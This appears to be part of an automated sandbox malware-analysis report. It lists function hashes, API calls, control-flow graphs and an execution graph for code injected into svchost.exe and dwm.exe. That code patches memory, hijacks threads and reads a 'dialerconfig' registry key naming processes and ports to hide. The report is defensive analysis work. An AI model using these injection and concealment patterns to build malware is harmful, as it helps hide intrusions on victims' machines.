                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: DE51183220638181E6B5CF29AA58BFA67DEF387790F442125DD9B03BB9CAB9C504C740
                                                                      Function 0000014E25EE26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: be8df8e1ec03d45ea558a2a3d3bbf99ec2db0f2b8a5c9b0990fe4d8467a9cadd
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: 6141B373325A8086DBA0CF25E9447EA77E8F7987A4F504021EE4E877A4EBBCC541C740
                                                                      Function 0000014E25ED94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: bb5eac71964d237cb1956cfb5dc8ea3c9076102839b00be22b734880a363d7cf
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: AC116D32215B8082EBA08F15F94079977E8F788B94F185220EECE47B69DF7CC551CB00
                                                                      Function 0000014E255D7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: b5321504703d7e0147251d0ef98098a33f2915f118edd02a8ea012e53d6d95a0
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: CBE08671A81B4690DF028F62E9406D833E4EB58B64B989122995D46321FA7CD5E9C700
                                                                      Function 0000014E255D73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: 87559b647f718a4499c20e0080e905f3e2ba32fd32d78ccb03bd9a23e031c331
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: 14E08672A41B4580DF028F61E9405D873A4F758B64B989122C95D46321EA7CD5E5C300
                                                                      Function 0000014E25ED1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 80f4dcfa44d35f3495c169fc2734898f5281015fff2d1e20470a50a81ec8734b
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: 69118235612B4481EA89DB66AA04AA973E9F789FD0F185028DE4E47776DFB8C442C300
                                                                      Function 0000014E25ED1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction ID: 8abaebeb9784320d361adda1798bbe6ec81508ad70680dff6d03265ff0a18030
                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction Fuzzy Hash: D3E039B562170486EB458B62F90878A36E5FB89B26F148028890A07362DFBD8499C750

                                                                      Execution Graph

                                                                      Execution Coverage:1.7%
                                                                      Dynamic/Decrypted Code Coverage:95%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:120
                                                                      Total number of Limit Nodes:16
                                                                      execution_graph 14772 283e0f428c8 14774 283e0f4290e 14772->14774 14773 283e0f42970 14774->14773 14776 283e0f43844 14774->14776 14777 283e0f43866 14776->14777 14778 283e0f43851 StrCmpNIW 14776->14778 14777->14774 14778->14777 14779 283e0f43ab9 14780 283e0f43a06 14779->14780 14781 283e0f43a56 VirtualQuery 14780->14781 14782 283e0f43a70 14780->14782 14783 283e0f43a8a VirtualAlloc 14780->14783 14781->14780 14781->14782 14783->14782 14784 283e0f43abb GetLastError 14783->14784 14784->14780 14785 283e0f1273c 14786 283e0f1276a 14785->14786 14787 283e0f127c5 VirtualAlloc 14786->14787 14790 283e0f128d4 14786->14790 14789 283e0f127ec 14787->14789 14787->14790 14788 283e0f12858 LoadLibraryA 14788->14789 14789->14788 14789->14790 14791 283e0f45cf0 14792 283e0f45cfd 14791->14792 14793 283e0f45d09 14792->14793 14795 283e0f45e1a 14792->14795 14794 283e0f45d3e 14793->14794 14796 283e0f45d8d 14793->14796 14797 283e0f45d66 SetThreadContext 14794->14797 14798 283e0f45e41 VirtualProtect FlushInstructionCache 14795->14798 14799 283e0f45efe 14795->14799 14797->14796 14798->14795 14800 283e0f45f1e 14799->14800 14813 283e0f443e0 14799->14813 14809 283e0f44df0 GetCurrentProcess 14800->14809 14803 283e0f45f23 14804 283e0f45f77 14803->14804 14805 283e0f45f37 ResumeThread 14803->14805 14817 283e0f47940 14804->14817 14806 283e0f45f6b 14805->14806 14806->14803 14808 283e0f45fbf 14810 283e0f44e0c 14809->14810 14811 283e0f44e53 14810->14811 14812 283e0f44e22 VirtualProtect FlushInstructionCache 14810->14812 14811->14803 14812->14810 14816 283e0f443fc 14813->14816 14814 283e0f4445f 14814->14800 14815 283e0f44412 VirtualFree 14815->14816 14816->14814 14816->14815 14818 283e0f47949 14817->14818 14819 283e0f47954 14818->14819 14820 283e0f4812c IsProcessorFeaturePresent 14818->14820 14819->14808 14821 283e0f48144 14820->14821 14824 283e0f48320 14821->14824 14823 283e0f48157 14823->14808 14827 283e0f48331 capture_current_context 14824->14827 14825 283e0f4833a RtlLookupFunctionEntry 14826 283e0f48389 14825->14826 14825->14827 14826->14823 14827->14825 14827->14826 14828 283e0f41abc 14833 283e0f41628 GetProcessHeap HeapAlloc 14828->14833 14830 283e0f41ad2 Sleep SleepEx 14831 283e0f41acb 14830->14831 14831->14830 14832 283e0f41598 StrCmpIW StrCmpW 14831->14832 14832->14831 14877 283e0f41268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14833->14877 14835 283e0f41650 14878 283e0f41268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14835->14878 14837 283e0f41661 14879 283e0f41268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14837->14879 14839 283e0f4166a 14880 283e0f41268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14839->14880 14841 283e0f41673 14842 283e0f4168e RegOpenKeyExW 14841->14842 14843 283e0f418a6 14842->14843 14844 283e0f416c0 RegOpenKeyExW 14842->14844 14843->14831 14845 283e0f416e9 14844->14845 14846 283e0f416ff RegOpenKeyExW 14844->14846 14887 283e0f412bc RegQueryInfoKeyW 14845->14887 14848 283e0f4173a RegOpenKeyExW 14846->14848 14849 283e0f41723 14846->14849 14852 283e0f41775 RegOpenKeyExW 14848->14852 14853 283e0f4175e 14848->14853 14881 283e0f4104c RegQueryInfoKeyW 14849->14881 14856 283e0f41799 14852->14856 14857 283e0f417b0 RegOpenKeyExW 14852->14857 14855 283e0f412bc 16 API calls 14853->14855 14860 283e0f4176b RegCloseKey 14855->14860 14861 283e0f412bc 16 API calls 14856->14861 14858 283e0f417d4 14857->14858 14859 283e0f417eb RegOpenKeyExW 14857->14859 14862 283e0f412bc 16 API calls 14858->14862 14863 283e0f41826 RegOpenKeyExW 14859->14863 14864 283e0f4180f 14859->14864 14860->14852 14865 283e0f417a6 RegCloseKey 14861->14865 14866 283e0f417e1 RegCloseKey 14862->14866 14868 283e0f4184a 14863->14868 14869 283e0f41861 RegOpenKeyExW 14863->14869 14867 283e0f4104c 6 API calls 14864->14867 14865->14857 14866->14859 14870 283e0f4181c RegCloseKey 14867->14870 14871 283e0f4104c 6 API calls 14868->14871 14872 283e0f41885 14869->14872 14873 283e0f4189c RegCloseKey 14869->14873 14870->14863 14874 283e0f41857 RegCloseKey 14871->14874 14875 283e0f4104c 6 API calls 14872->14875 14873->14843 14874->14869 14876 283e0f41892 RegCloseKey 14875->14876 14876->14873 14877->14835 14878->14837 14879->14839 14880->14841 14882 283e0f411b5 RegCloseKey 14881->14882 14883 283e0f410bf 14881->14883 14882->14848 14883->14882 14884 283e0f410cf RegEnumValueW 14883->14884 14886 283e0f41125 14884->14886 14885 283e0f4114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14885->14886 14886->14882 14886->14884 14886->14885 14888 283e0f41327 GetProcessHeap HeapAlloc 14887->14888 14889 283e0f4148a RegCloseKey 14887->14889 14890 283e0f41476 GetProcessHeap HeapFree 14888->14890 14891 283e0f41352 RegEnumValueW 14888->14891 14889->14846 14890->14889 14892 283e0f413a5 14891->14892 14892->14890 14892->14891 14894 283e0f413d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14892->14894 14895 283e0f4141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14892->14895 14896 283e0f4152c 14892->14896 14894->14895 14895->14892 14897 283e0f41546 14896->14897 14900 283e0f4157c 14896->14900 14898 283e0f41565 StrCmpW 14897->14898 14899 283e0f4155d StrCmpIW 14897->14899 14897->14900 14898->14897 14899->14897 14900->14892 14901 283e0f4554d 14903 283e0f45554 14901->14903 14902 283e0f455bb 14903->14902 14904 283e0f45637 VirtualProtect 14903->14904 14905 283e0f45663 GetLastError 14904->14905 14906 283e0f45671 14904->14906 14905->14906

                                                                      Executed Functions

                                                                      Function 00000283E0F41628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 106492572-2879589442
                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction ID: a5ca2d59cd59f8e582a86069b6c0422498232920e3b59dff40cf708cd0215b07
                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction Fuzzy Hash: A9712E3A316A1186EF20DF65E8686593764FF84F98F409131DD4E47B69EF38CA66C340
                                                                      Function 00000283E0F43790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: d50538e1b7efed74cc2e06f4c0201756d72878e9e0accb22fe10cfe9aeb6aae8
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: 40115E3A70AB4183EF54DB61E428269A6A0FB48F95F448039DE9907794EF3DCA16C704
                                                                      Function 00000283E0F45B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 57 283e0f45b30-283e0f45b57 58 283e0f45b59-283e0f45b68 57->58 59 283e0f45b6b-283e0f45b76 GetCurrentThreadId 57->59 58->59 60 283e0f45b78-283e0f45b7d 59->60 61 283e0f45b82-283e0f45b89 59->61 62 283e0f45faf-283e0f45fc6 call 283e0f47940 60->62 63 283e0f45b9b-283e0f45baf 61->63 64 283e0f45b8b-283e0f45b96 call 283e0f45960 61->64 66 283e0f45bbe-283e0f45bc4 63->66 64->62 70 283e0f45bca-283e0f45bd3 66->70 71 283e0f45c95-283e0f45cb6 66->71 73 283e0f45c1a-283e0f45c8d call 283e0f44510 call 283e0f444b0 call 283e0f44470 70->73 74 283e0f45bd5-283e0f45c18 call 283e0f485c0 70->74 75 283e0f45e1f-283e0f45e30 call 283e0f474bf 71->75 76 283e0f45cbc-283e0f45cdc GetThreadContext 71->76 86 283e0f45c90 73->86 74->86 90 283e0f45e35-283e0f45e3b 75->90 79 283e0f45e1a 76->79 80 283e0f45ce2-283e0f45d03 76->80 79->75 80->79 89 283e0f45d09-283e0f45d12 80->89 86->66 92 283e0f45d14-283e0f45d25 89->92 93 283e0f45d92-283e0f45da3 89->93 94 283e0f45e41-283e0f45e98 VirtualProtect FlushInstructionCache 90->94 95 283e0f45efe-283e0f45f0e 90->95 99 283e0f45d27-283e0f45d3c 92->99 100 283e0f45d8d 92->100 103 283e0f45e15 93->103 104 283e0f45da5-283e0f45dc3 93->104 101 283e0f45ec9-283e0f45ef9 call 283e0f478ac 94->101 102 283e0f45e9a-283e0f45ea4 94->102 97 283e0f45f10-283e0f45f17 95->97 98 283e0f45f1e-283e0f45f2a call 283e0f44df0 95->98 97->98 106 283e0f45f19 call 283e0f443e0 97->106 119 283e0f45f2f-283e0f45f35 98->119 99->100 108 283e0f45d3e-283e0f45d88 call 283e0f43970 SetThreadContext 99->108 100->103 101->90 102->101 109 283e0f45ea6-283e0f45ec1 call 283e0f44390 102->109 104->103 110 283e0f45dc5-283e0f45e10 call 283e0f43900 call 283e0f474dd 104->110 106->98 108->100 109->101 110->103 123 283e0f45f77-283e0f45f95 119->123 124 283e0f45f37-283e0f45f75 ResumeThread call 283e0f478ac 119->124 126 283e0f45f97-283e0f45fa6 123->126 127 283e0f45fa9 123->127 124->119 126->127 127->62
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                      • Instruction ID: 978b1b2165db2147f18f165d684c3aab6251e4cf4322cfd67d1f96384ea11c97
                                                                      • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                      • Instruction Fuzzy Hash: 5FD1AD7A20AB8881DA70DB56E4A435A77A0F7C8F85F144126EECD47BA5DF3CC652CB40
                                                                      Function 00000283E0F450D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 129 283e0f450d0-283e0f450fc 130 283e0f4510d-283e0f45116 129->130 131 283e0f450fe-283e0f45106 129->131 132 283e0f45127-283e0f45130 130->132 133 283e0f45118-283e0f45120 130->133 131->130 134 283e0f45141-283e0f4514a 132->134 135 283e0f45132-283e0f4513a 132->135 133->132 136 283e0f45156-283e0f45161 GetCurrentThreadId 134->136 137 283e0f4514c-283e0f45151 134->137 135->134 139 283e0f45163-283e0f45168 136->139 140 283e0f4516d-283e0f45174 136->140 138 283e0f456d3-283e0f456da 137->138 139->138 141 283e0f45176-283e0f4517c 140->141 142 283e0f45181-283e0f4518a 140->142 141->138 143 283e0f45196-283e0f451a2 142->143 144 283e0f4518c-283e0f45191 142->144 145 283e0f451a4-283e0f451c9 143->145 146 283e0f451ce-283e0f45225 call 283e0f456e0 * 2 143->146 144->138 145->138 151 283e0f45227-283e0f4522e 146->151 152 283e0f4523a-283e0f45243 146->152 153 283e0f45236 151->153 154 283e0f45230 151->154 155 283e0f45255-283e0f4525e 152->155 156 283e0f45245-283e0f45252 152->156 153->152 158 283e0f452a6-283e0f452aa 153->158 157 283e0f452b0-283e0f452b6 154->157 159 283e0f45273-283e0f45298 call 283e0f47870 155->159 160 283e0f45260-283e0f45270 155->160 156->155 161 283e0f452b8-283e0f452d4 call 283e0f44390 157->161 162 283e0f452e5-283e0f452eb 157->162 158->157 170 283e0f4532d-283e0f45342 call 283e0f43cc0 159->170 171 283e0f4529e 159->171 160->159 161->162 172 283e0f452d6-283e0f452de 161->172 165 283e0f45315-283e0f45328 162->165 166 283e0f452ed-283e0f4530c call 283e0f478ac 162->166 165->138 166->165 176 283e0f45344-283e0f4534c 170->176 177 283e0f45351-283e0f4535a 170->177 171->158 172->162 176->158 178 283e0f4536c-283e0f453ba call 283e0f48c60 177->178 179 283e0f4535c-283e0f45369 177->179 182 283e0f453c2-283e0f453ca 178->182 179->178 183 283e0f454d7-283e0f454df 182->183 184 283e0f453d0-283e0f454bb call 283e0f47440 182->184 185 283e0f45523-283e0f4552b 183->185 186 283e0f454e1-283e0f454f4 call 283e0f44590 183->186 196 283e0f454bf-283e0f454ce call 283e0f44060 184->196 197 283e0f454bd 184->197 189 283e0f45537-283e0f45546 185->189 190 283e0f4552d-283e0f45535 185->190 200 283e0f454f8-283e0f45521 186->200 201 283e0f454f6 186->201 194 283e0f45548 189->194 195 283e0f4554f 189->195 190->189 193 283e0f45554-283e0f45561 190->193 198 283e0f45563 193->198 199 283e0f45564-283e0f455b9 call 283e0f485c0 193->199 194->195 195->193 206 283e0f454d0 196->206 207 283e0f454d2 196->207 197->183 198->199 208 283e0f455c8-283e0f45661 call 283e0f44510 call 283e0f44470 VirtualProtect 199->208 209 283e0f455bb-283e0f455c3 199->209 200->183 201->185 206->183 207->182 214 283e0f45663-283e0f45668 GetLastError 208->214 215 283e0f45671-283e0f456d1 208->215 214->215 215->138
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                      • Instruction ID: dc498c83d674fe2880933a75a832fcd50fd79594bc90b361b1ece1c4f703afdd
                                                                      • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                      • Instruction Fuzzy Hash: 2A02E93661EB8486EB60DB55F4A435AB7A0F7C4B84F104025EE8E87BA9DF7CC595CB00
                                                                      Function 00000283E0F439E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$AllocQuery
                                                                      • String ID:
                                                                      • API String ID: 31662377-0
                                                                      • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                      • Instruction ID: 599be039a61133beec046f9d4de96158a5cae83d348939f95c0d2c0bed209933
                                                                      • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                      • Instruction Fuzzy Hash: 6131283921FA8481EA30DB15E06935E66A0FB84F84F108535FECD46798DF7CC7A28B04
                                                                      Function 00000283E0F4328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: 23eeb1e90ca0b909da206c4682b0fbc9afc4c2a49a857e9a89fda45fbc286550
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: A9115B79A1A64282FB60DB61F83D36922A4BF54F45F50C134AD5682591EF7CC7768340
                                                                      Function 00000283E0F44DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 3733156554-0
                                                                      • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                      • Instruction ID: 7d4d528eda31144e0ca2cfab9647e4bf8748e64f9f138f1bf7edab6c572f20e4
                                                                      • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                      • Instruction Fuzzy Hash: 1CF0303A61EB04C0D630DB41E46435A6BA0F788FD4F148121FE8D43B69CE3CC7A28B40
                                                                      Function 00000283E0F1273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 263 283e0f1273c-283e0f127a4 call 283e0f129d4 * 4 272 283e0f127aa-283e0f127ad 263->272 273 283e0f129b2 263->273 272->273 274 283e0f127b3-283e0f127b6 272->274 275 283e0f129b4-283e0f129d0 273->275 274->273 276 283e0f127bc-283e0f127bf 274->276 276->273 277 283e0f127c5-283e0f127e6 VirtualAlloc 276->277 277->273 278 283e0f127ec-283e0f1280c 277->278 279 283e0f12838-283e0f1283f 278->279 280 283e0f1280e-283e0f12836 278->280 281 283e0f12845-283e0f12852 279->281 282 283e0f128df-283e0f128e6 279->282 280->279 280->280 281->282 285 283e0f12858-283e0f1286a LoadLibraryA 281->285 283 283e0f128ec-283e0f12901 282->283 284 283e0f12992-283e0f129b0 282->284 283->284 286 283e0f12907 283->286 284->275 287 283e0f128ca-283e0f128d2 285->287 288 283e0f1286c-283e0f12878 285->288 292 283e0f1290d-283e0f12921 286->292 287->285 290 283e0f128d4-283e0f128d9 287->290 289 283e0f128c5-283e0f128c8 288->289 289->287 293 283e0f1287a-283e0f1287d 289->293 290->282 294 283e0f12923-283e0f12934 292->294 295 283e0f12982-283e0f1298c 292->295 296 283e0f128a7-283e0f128b7 293->296 297 283e0f1287f-283e0f128a5 293->297 299 283e0f12936-283e0f1293d 294->299 300 283e0f1293f-283e0f12943 294->300 295->284 295->292 303 283e0f128ba-283e0f128c1 296->303 297->303 304 283e0f12970-283e0f12980 299->304 301 283e0f12945-283e0f1294b 300->301 302 283e0f1294d-283e0f12951 300->302 301->304 305 283e0f12963-283e0f12967 302->305 306 283e0f12953-283e0f12961 302->306 303->289 304->294 304->295 305->304 308 283e0f12969-283e0f1296c 305->308 306->304 308->304
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: AllocLibraryLoadVirtual
                                                                      • String ID:
                                                                      • API String ID: 3550616410-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: fc8f6cbc34088f36d80d8f67faccd3d2991b6f772c67a401c01523ada7272f5c
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: 5761EE3AB0269487DA94CF59D02876DB392FB64BA4F98C1318E590378ADE38D973D700
                                                                      Function 00000283E0F41ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00000283E0F41628: GetProcessHeap.KERNEL32 ref: 00000283E0F41633
                                                                        • Part of subcall function 00000283E0F41628: HeapAlloc.KERNEL32 ref: 00000283E0F41642
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F416B2
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F416DF
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F416F9
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F41719
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F41734
